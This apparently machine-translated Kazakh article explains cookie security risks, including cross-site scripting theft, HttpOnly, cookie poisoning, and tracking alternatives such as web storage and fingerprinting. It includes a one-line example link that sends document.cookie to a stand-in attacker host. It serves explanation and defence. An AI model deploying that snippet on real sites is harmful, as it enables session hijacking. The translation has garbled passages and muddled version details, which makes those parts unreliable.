Cookie файлдарын ұрлаудың тағы бір жолы - сайттарды скрипттеу және браузердің өзі оларды ешқашан қабылдамайтын зиянды серверлерге cookie файлдарын жіберу. Қазіргі браузерлер серверден кодтың ізденетін бөліктерін орындауға мүмкіндік береді. Егер cookie файлдары орындалу уақытында қолжетімді болса, олардың мәндері оларға қол жеткізе алмайтын серверлерге қандай да бір пішінде хабарлануы мүмкін. Сookie файлдарын желі арқылы жібермес бұрын шифрлау шабуылдың алдын алуға көмектеспейді.

Сайт ішіндегі сценарийлердің бұл түрі әдетте пайдаланушыларға HTML мазмұнын жариялауға мүмкіндік беретін сайттардағы шабуылдаушылармен қолданылады. HTML үлесінде үйлесімді кодтың бір бөлігін біріктіру арқылы шабуылдаушы басқа пайдаланушылардан cookie файлдарын ала алады. Бұл cookie файлдары туралы білім ұрланған cookie файлдарын пайдаланып бір сайтқа қосылу арқылы пайдаланылуы мүмкін, осылайша cookie файлдары ұрланған пайдаланушы ретінде танылады.

Мұндай шабуылдарды болдырмаудың бір жолы - HttpOnly жалауын пайдалану; бұл сценарийге жақын клиент үшін cookie файлын қолжетімсіз ету үшін жоспарланған 6 нұсқасынан бастап PHP жүйесіндегі Internet Explorer 5.2.0 нұсқасынан бастап енгізілген опция. Дегенмен, веб-әзірлеушілер сайттағы сценарийлерге иммунитеті болуы үшін сайтты әзірлеу кезінде мұны ескеруі керек.

Қауіпсіздікке қатысты тағы бір қауіп - бұл сайтта сұраныс жасау.

Ресми техникалық спецификация cookie файлдарын тек олар шыққан домендегі серверлерге қайтаруға мүмкіндік береді. Дегенмен, cookie файлдарының мәні cookie тақырыптарынан басқа құралдарды пайдаланып басқа серверлерге жіберілуі мүмкін.

Атап айтқанда, JavaScript сияқты сценарий тілдеріне әдетте cookie файлдарының мәндеріне қол жеткізуге рұқсат етіледі және Интернеттегі кез келген серверге ерікті мәндерді жіберуге қабілетті. Бұл сценарий мүмкіндігі пайдаланушыларға басқа пайдаланушылардың көруі үшін HTML мазмұнын жариялауға мүмкіндік беретін веб-сайттардан пайдаланылады.

Мысалы, example.com доменінде жұмыс істейтін шабуылдаушы басқаша басқармайтын танымал блогты көрсететін келесі сілтемесі бар түсініктеме жариялауы мүмкін:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Басқа пайдаланушы осы сілтемені басқанда, браузер кодтың onclick атрибутының бөлігін орындайды, осылайша, document.cookie жолын осы бет үшін белсенді пайдаланушы cookie файлдарының тізімімен ауыстырады. Сондықтан cookie файлдарының бұл тізімі example.com серверіне жіберіледі, сондықтан шабуылдаушы осы пайдаланушының cookie файлдарын жинай алады.

Шабуылдың бұл түрін пайдаланушы тарапынан анықтау қиын, себебі сценарий cookie файлын орнатқан бірдей доменнен келеді және мәндерді жіберу операциясы сол доменмен рұқсат етілген сияқты. Зиянды кодтың жариялануын болдырмайтын шектеулерді енгізу сайттың осы түрін басқаратын әкімшілерге жүктеледі деп саналады.

Cookie файлдары HttpOnly жалаушасымен жіберілген болса, JavaScript сияқты клиенттік бағдарламаларға тікелей көрінбейді. Сервердің көзқарасы бойынша, жалғыз айырмашылық - Set-Cookie тақырыбының жолында HttpOnly жолын қамтитын жаңа өріс қосылған:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Браузер мұндай cookie файлын алған кезде, оны келесі HTTP алмасуында әдетте пайдалану керек, бірақ оны клиент жағында орындалатын сценарийлерге көрсетпейді. HttpOnly жалаушасы кез келген ресми техникалық сипаттаманың бөлігі емес және барлық браузерлерде іске асырылмайды. Қазіргі уақытта XMLHTTPRequest әдісі арқылы сеанс cookie файлдарын оқу мен жазуды болдырмаудың ешқандай жолы жоқ екенін ескеріңіз.

Мазмұнды өзгерту: шабуылдаушы серверге жіберілген жарамды cookie файлынан жасалған жарамсыз cookie файлын жібереді.

Cookie файлдарын өзгерту

Cookie файлдарын сақтау және серверге өзгеріссіз қайтару қажет болған кезде, шабуылдаушы cookie файлдарының мәнін серверге қайтарылмас бұрын өзгерте алады. Мысалы, cookie файлында дүкеннің қоржынына орналастырылған элементтер үшін пайдаланушы төлеуі тиіс жалпы мән болса, бұл мәнді өзгерту серверді шабуылдаушыдан бастапқы бағадан төмен зарядтау қаупіне ұшыратады. Cookie файлдарының мәнін өзгерту процесі деп аталады печеньеден улану және шабуылды тұрақты ету үшін cookie файлдарын ұрлаудан кейін пайдалануға болады.

Cookie файлдарын қайта анықтау әдісінде шабуылдаушы серверге жарамсыз cookie файлын жіберу үшін браузер ақауын пайдаланады.

Дегенмен, көптеген веб-сайттар тек сеанс идентификаторын — сеанс пайдаланушысын анықтау үшін пайдаланылатын кездейсоқ құрылған бірегей нөмірді — cookie файлының өзінде сақтайды, ал қалған барлық ақпарат серверде сақталады. Бұл жағдайда бұл мәселе негізінен шешіледі.

Веб-сайттар арасында cookie файлдарын өңдеу

Әрбір сайтта өзінің cookie файлдары болады деп күтілуде, сондықтан бір сайт басқа сайтпен байланысты cookie файлдарын өзгерте немесе жасай алмайды. Веб-шолғыштың қауіпсіздік кемшілігі зиянды сайттарға бұл ережені бұзуға мүмкіндік береді. Мұндай кемшілікті пайдалану әдетте деп аталады сайтаралық пісіру. Мұндай шабуылдардың мақсаты сеанс идентификаторын ұрлау болуы мүмкін.

Пайдаланушылар бұл осалдықтар іс жүзінде жойылатын веб-шолғыштардың соңғы нұсқаларын пайдалануы керек.

Клиент пен сервер арасындағы қайшылықты күй

Cookie файлдарын пайдалану клиенттің күйі мен cookie файлында сақталған күй арасында қайшылық тудыруы мүмкін. Егер пайдаланушы cookie файлын алып, шолғыштың «Артқа» түймесін басса, шолғыштың күйі әдетте осы сатып алудан бұрынғыдай емес. Мысалы, егер интернет-дүкен себеті cookie файлдары арқылы жасалса, пайдаланушы шолғыш тарихына оралған кезде себеттің мазмұны өзгермейді: егер пайдаланушы өз себетіне мақала қосу үшін түймені басып, «Қайтару» түймесін басса. " түймесі, мақала осы мақалада қалады. Бұл, әрине, мақаланы қосудан бас тартқысы келетін пайдаланушының ниеті болмауы мүмкін. Бұл сенімсіздікке, шатасуға және қателерге әкелуі мүмкін. Сондықтан веб-әзірлеушілер бұл мәселеден хабардар болуы және осындай жағдайларды шешу үшін шаралар қолдануы керек.

Cookie жарамдылық мерзімі

Тұрақты cookie файлдарын құпиялылық қауіпсіздігі бойынша сарапшылар сынға алды, бұл тез арада бітпейді, осылайша веб-сайттарға пайдаланушыларды бақылауға және олардың профилін уақыт өте келе құруға мүмкіндік береді. Cookie файлдарының бұл аспектісі де сеансты ұрлау мәселесінің бір бөлігі болып табылады, себебі ұрланған тұрақты cookie ұзақ уақыт бойы пайдаланушының кейпін көрсету үшін пайдаланылуы мүмкін.

Сондай-ақ оқыңыз: GAFAM: олар кім? Неліктен олар (кейде) соншалықты қорқынышты?

Cookie файлдарының баламалары

Cookie файлдарын пайдалану арқылы орындауға болатын кейбір әрекеттерді cookie файлдарынан бас тартуға немесе жойылған cookie файлдарын қайта жасауға мүмкіндік беретін басқа механизмдер арқылы орындауға болады, бұл cookie файлдарымен бірдей (немесе кейде одан да нашар, себебі ол көрінбейтіндіктен) құпиялылық мәселелерін тудырады.

IP мекенжайы

Пайдаланушыларды бетке қоңырау шалатын компьютердің IP мекенжайы арқылы бақылауға болады. Бұл әдіс World Wide Web енгізілгеннен бері қол жетімді, өйткені беттер жүктелген кезде сервер браузер немесе прокси арқылы жұмыс істейтін компьютердің IP мекенжайын сұрайды, егер ешқайсысы пайдаланылмаса. Сервер бұл ақпаратты қолданыста cookie файлдарының бар-жоғын бақылай алады. Дегенмен, бұл мекенжайлар әдетте cookie файлдарына қарағанда пайдаланушыны анықтауда сенімді емес, өйткені компьютерлер мен прокси-серверлерді бірнеше пайдаланушы ортақ пайдалануы мүмкін және бір компьютер әр жұмыс сеансында басқа IP мекенжайын алуы мүмкін (мысалы, телефон қосылымдары үшін жиі жағдай). .

IP мекенжайлары бойынша бақылау кейбір жағдайларда сенімді болуы мүмкін, мысалы, қуат қосулы болған кезде бірдей IP мекенжайын ұзақ уақыт сақтайтын кең жолақты қосылымдар.

Tor сияқты кейбір жүйелер Интернеттің анонимділігін сақтауға және IP мекенжайы бойынша бақылауды мүмкін емес немесе мүмкін емес етуге арналған.

URL

Нақтырақ әдіс URL мекенжайларына ақпаратты енгізуге негізделген. URL мекенжайының сұрау жолы бөлігі әдетте осы мақсат үшін пайдаланылатын бір әдіс болып табылады, бірақ басқа бөліктерді де пайдалануға болады. Java серверлеті де, PHP сеансы механизмдері де cookie файлдары қосылмаған болса, осы әдісті пайдаланады.

Бұл әдіс браузерге жіберілген кезде оны тасымалдайтын веб-беттің сілтемелеріне жол сұрауларын қосатын веб-серверді қамтиды. Пайдаланушы сілтемені орындаған кезде, шолғыш серверге тіркелген сұрау жолын қайтарады.

Осы мақсат үшін пайдаланылатын сұрау жолдары мен cookie файлдары өте ұқсас, екеуі де сервер ерікті түрде таңдаған және браузер қайтаратын ақпарат. Дегенмен, кейбір айырмашылықтар бар: сұрау жолын қамтитын URL қайта пайдаланылғанда, сол ақпарат серверге жіберіледі. Мысалы, егер пайдаланушының теңшелімдері URL мекенжайының сұрау жолында кодталған болса және пайдаланушы сол URL мекенжайын басқа пайдаланушыға электрондық пошта арқылы жіберсе, сол пайдаланушы да сол теңшелімдерді пайдалана алады.

Екінші жағынан, пайдаланушы бір бетке екі рет кіргенде, бірдей сұрау жолы екі рет де пайдаланылатынына кепілдік жоқ. Мысалы, егер пайдаланушы веб-сайттың ішкі бетіндегі бетке бірінші рет келіп, екінші рет сыртқы беттен бір бетке түссе, сайт бетіне қатысты сұрау жолы әдетте әртүрлі, ал cookie файлдары бірдей .

Сұрау жолдарының басқа кемшіліктері қауіпсіздікке қатысты: сұрау жолдарында сеансты анықтайтын деректерді сақтау сеансты бекіту шабуылдарын, идентификатор анықтамалық шабуылдарын және басқа эксплуаттарды қосады немесе жеңілдетеді. Сеанс идентификаторларын HTTP cookie файлдары ретінде беру қауіпсізірек.

Жасырын пішін өрісі

ASP.NET пайдаланатын сеансты бақылаудың бір түрі жасырын өрістері бар веб-пішіндерді пайдалану болып табылады. Бұл әдіс ақпаратты тасымалдау үшін URL сұрау жолдарын пайдалануға өте ұқсас және бірдей артықшылықтар мен кемшіліктерге ие; және пішін HTTP GET әдісімен өңделсе, өрістер пішінді жіберген кезде оны жіберетін шолғыштың URL мекенжайының бөлігі болады. Бірақ көптеген пішіндер HTTP POST көмегімен өңделеді, бұл пішін ақпаратын, соның ішінде жасырын өрістерді URL мекенжайының бөлігі де, cookie файлы да емес қосымша кіріс ретінде қосуға әкеледі.

Бұл тәсілдің қадағалау тұрғысынан екі артықшылығы бар: біріншіден, URL мекенжайына емес, HTML бастапқы кодына және POST енгізуіне орналастырылған ақпаратты қадағалау қарапайым пайдаланушыға бұл бақылауды болдырмауға мүмкіндік береді; екіншіден, пайдаланушы URL мекенжайын көшіргенде (мысалы, бетті дискіге сақтау немесе электрондық пошта арқылы жіберу үшін) сеанс ақпараты көшірілмейді.

window.name

Барлық қарапайым веб-шолғыштар DOM файлының window.name сипатын пайдаланып JavaScript арқылы деректердің үлкен көлемін (2МБ-тан 32МБ-қа дейін) сақтай алады. Бұл деректер сеанс cookie файлдарының орнына пайдаланылуы мүмкін және сонымен қатар домендерде қолданылады. Техниканы клиенттік сеанс айнымалы мәндерінің күрделі жинағын сақтау үшін JSON нысандарымен біріктіруге болады.

Кемшілігі - әрбір бөлек терезеде немесе қойындыда бастапқыда бос window.name болады; қойындылар бойынша шолу кезінде (пайдаланушы ашады) бұл жеке ашылған қойындылардың терезе атауы болмайтынын білдіреді. Сонымен қатар window.name құпиялылық мәселесін тудыруы мүмкін әртүрлі сайттардағы келушілерді бақылау үшін пайдаланылуы мүмкін.

Кейбір аспектілерде бұл сервердің қатыспауына байланысты cookie файлдарына қарағанда қауіпсіз болуы мүмкін, осылайша оны sniffer cookie файлдарының желілік шабуылынан қорғансыз етеді. Дегенмен, егер деректерді қорғау үшін арнайы шаралар қабылданса, ол одан әрі шабуылдарға осал болады, өйткені деректер бір терезеде ашылған басқа сайттар арқылы қол жетімді.

HTTP аутентификациясы

HTTP протоколы пайдаланушы аты мен құпия сөзді бергенде ғана веб-бетке кіруге мүмкіндік беретін қол жеткізудің аутентификациясының негізгі протоколдарын және кіру аутентификациясының дайджестін қамтиды. Сервер веб-бетке рұқсат беру үшін сертификатты сұраса, шолғыш оны пайдаланушыдан сұрайды және алғаннан кейін шолғыш оны сақтайды және оны барлық келесі HTTP сұрауларына жібереді. Бұл ақпаратты пайдаланушыны қадағалау үшін пайдалануға болады.

Жергілікті ортақ нысан

Браузерде Adobe Flash Player плагині болса, жергілікті ортақ нысандар cookie файлдарымен бірдей мақсатта пайдалануға болады. Олар веб-әзірлеушілер үшін тартымды таңдау болуы мүмкін, себебі:

• жергілікті ортақ нысан үшін әдепкі өлшем шегі 100 КБ құрайды;
• қауіпсіздік тексерулері пайдаланушы куки тексерулерінен бөлек (сондықтан cookie файлдары болмаған кезде жергілікті ортақ нысандарға рұқсат етілуі мүмкін).

Бұл соңғы нүкте, ол cookie файлдарын басқару саясатын Adobe жергілікті ортақ нысандарынан ерекшелендіреді сұрақтар туғызады пайдаланушының өзінің құпиялылық параметрлерін басқаруына қатысты: ол оның cookie файлдарын басқаруы жергілікті ортақ нысандарды басқаруға әсер етпейтінін білуі керек және керісінше.

Бұл жүйенің тағы бір сыны - оны тек Adobe Flash Player плагині арқылы пайдалануға болады, ол веб-стандартты емес, меншікті болып табылады.

Клиенттік тұрақтылық

Кейбір веб-шолғыштар бетке ақпаратты кейінірек пайдалану үшін жергілікті түрде сақтауға мүмкіндік беретін сценарийге негізделген тұрақтылық механизмін қолдайды. Мысалы, Internet Explorer шолғыш журналындағы, бетбелгілердегі, XML форматында немесе тікелей дискіде сақталған веб-беттегі тұрақты ақпаратты қолдайды. Microsoft Internet Explorer 5 үшін DHTML әрекеттері арқылы қол жетімді пайдаланушы-деректер әдісі бар.

W3C HTML 5-те веб-сақтау деп аталатын клиенттік деректерді сақтауға арналған жаңа JavaScript API енгізді және cookie файлдарын біржола ауыстыруды мақсат етті. Ол cookie файлдарына ұқсас, бірақ өте жақсартылған сыйымдылығымен және HTTP сұрауларының тақырыбында ақпаратты сақтамайды. API веб-жадтың екі түріне мүмкіндік береді: тұрақты cookie файлдары мен сеанс cookie файлдарына ұқсас жергілікті сақтау және сеанс қоймасы (сеанс cookie файлдарының мерзімі браузер жабылған кезде бітетінін қоспағанда) сеанстарды сақтау қойындысы жабылған кезде мерзімі аяқталады). Веб жадына Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 және Opera 10.50 қолдау көрсетеді.

Басқа механизм әдетте веб-беттердегі JavaScript бағдарламаларын пайдаланып шолғышты кэштеуге (жаңартудан гөрі жадта) сүйенеді. 

Мысалы, бетте тег болуы мүмкін . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Бұл кезде бағдарлама кэш жадыда қалады және кірген бет екінші рет қайта жүктелмейді. Демек, егер бағдарламада ғаламдық айнымалы болса (мысалы, var id = 3243242;), бұл идентификатор жарамды болып қалады және бет қайта жүктелгеннен кейін немесе бағдарламаны байланыстыратын бет жүктелгеннен кейін басқа JavaScript коды арқылы пайдаланылуы мүмкін. 

Бұл әдістің басты кемшілігі JavaScript жаһандық айнымалысы статикалық болуы керек, яғни оны cookie файлы сияқты өзгерту немесе жою мүмкін емес.

веб-шолғыштың саусақ ізі

Браузердің саусақ ізі – идентификация мақсатында шолғыштың конфигурация параметрлері туралы жиналған ақпарат. Бұл саусақ іздері тіпті cookie файлдары өшірілген кезде де Интернет пайдаланушысын немесе құрылғыны толық немесе ішінара анықтау үшін пайдаланылуы мүмкін.

Веб-шолғыш конфигурациясының негізгі ақпараты адамның веб-трафикін дәл өлшеу және басу алаяқтығының әртүрлі нысандарын анықтау мақсатында веб-сайт аудиториясының қызметтерімен бұрыннан жинақталған. Клиенттік сценарий тілдерінің көмегімен ақпаратты жинау әлдеқайда дәлірек болады енді мүмкін.

Бұл ақпаратты бит жолына түрлендіру құрылғының саусақ ізін жасайды. 2010 жылы Electronic Frontier Foundation (EFF) шолғыштың саусақ ізінің энтропиясын кем дегенде өлшеген. 18,1 бит, және бұл кенепте саусақ ізін алудағы жетістіктер сол энтропияға 5,7 бит қосқанға дейін болды.

Бір сөзбен айтқанда печенье

Cookie файлдары веб-браузер арқылы веб-сайтқа кірушінің қатты дискісінде сақталатын және (басқа нәрселермен қатар) кіруші немесе олардың сайттағы саяхаты туралы ақпаратты жазу үшін пайдаланылатын шағын мәтіндік файлдар. Веб-шебер осылайша келушінің әдеттерін тани алады және әр келуші үшін өз сайтының көрсетілімін жекелей алады; содан кейін cookie файлдары басты бетте қанша мақаланы көрсету керектігін есте сақтауға немесе тіпті кез келген жеке тараптың логин деректерін сақтауға мүмкіндік береді: кіруші сайтқа оралған кезде, оның аты мен құпия сөзін теру қажет емес. танылуы мүмкін, өйткені олар cookie файлында автоматты түрде оқылады.

Cookie файлының сайт дизайнері белгілеген шектеулі қызмет ету мерзімі бар. Олар сондай-ақ браузердің жабылуына сәйкес келетін сайттағы сессияның соңында аяқталуы мүмкін. Cookie файлдары келушілердің өмірін жеңілдету және оларға маңыздырақ ақпарат беру үшін кеңінен қолданылады. Бірақ арнайы әдістер келушіні бірнеше сайтта қадағалап отыруға және осылайша оның әдеттері туралы өте кең ақпаратты жинауға және өзара тексеруге мүмкіндік береді. Бұл әдіс cookie файлдарын келушілердің құпиялылығын бұзатын бақылау әдісі ретінде атақ берді, бұл өкінішке орай техникалық емес себептермен немесе пайдаланушылардың күтулерін ескермейтін көптеген жағдайларда шындыққа сәйкес келеді. .

Осы заңды қорқыныштарға жауап ретінде HTML 5 клиенттік деректерді сақтау үшін веб-сақтау деп аталатын жаңа JavaScript API ұсынады, ол әлдеқайда қауіпсіз және cookie файлдарын ауыстыруға бағытталған.

Cookie файлдарын сақтау

Кейбір браузерлерде cookie оңай өңделеді, оның мәндерін қолмен өзгерту үшін Блокнот сияқты қарапайым мәтіндік редактор жеткілікті.

Cookie файлдары браузерге байланысты әртүрлі сақталады:

• Microsoft Internet Explorer әрбір cookie файлын басқа файлға сақтайды;
• Mozilla Firefox оның барлық cookie файлдарын бір файлда сақтайды;
• опера өзінің барлық cookie файлдарын бір файлда сақтайды және оларды шифрлайды (бағдарламалық құрал опцияларынан басқа оларды өзгерту мүмкін емес);
• Apple Safari оның барлық cookie файлдарын бір .plist кеңейтім файлында сақтайды. Өзгерту мүмкін, бірақ бағдарламалық жасақтама опциялары арқылы өтпейінше, оңай емес.

Браузерлерге қолдау көрсету қажет кем дегенде :

• 300 бір мезгілде печенье;
• бір кукиге 4 o;
• Әр хостқа немесе доменге 20 cookie файлы.